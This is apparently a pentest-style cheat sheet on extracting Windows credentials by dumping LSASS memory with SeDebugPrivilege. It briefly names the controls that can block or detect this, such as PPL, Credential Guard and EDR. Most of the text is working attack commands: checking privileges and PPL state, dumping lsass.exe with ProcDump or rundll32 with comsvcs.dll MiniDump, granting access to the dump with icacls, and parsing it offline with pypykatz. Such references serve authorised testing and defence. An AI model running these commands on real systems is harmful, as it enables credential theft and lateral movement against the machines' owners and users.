LSASS dumping with SeDebugPrivilege is credential extraction. It can lead to lateral movement or local escalation if recovered credentials are reusable.
This path is noisy on monitored endpoints. PPL, Credential Guard, EDR, and dump policy can block or detect it.
When enumerating LSASS dumping opportunities, try to identify:
SeDebugPrivilegein the current token- High-integrity context
- LSASS PID
- LSASS protection state
- Writable dump path
- Offline parsing path
Enumeration
Check privilege and integrity:
whoami /priv
whoami /groups | findstr /i "Mandatory"
Find LSASS:
tasklist /fi "imagename eq lsass.exe"
Check PPL state:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL
Interesting findings include:
SeDebugPrivilegepresent- LSASS is not protected as PPL
- Dump file can be written to disk
- Endpoint controls do not block process access
Once confirmed, dump the process and parse offline.
Exploit
Dump LSASS with ProcDump:
procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass.dmp
Built-in alternative using comsvcs.dll:
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full
Grant access to the dump if needed:
icacls C:\Windows\Temp\lsass.dmp /grant %USERNAME%:F
Parse offline:
pypykatz lsa minidump lsass.dmp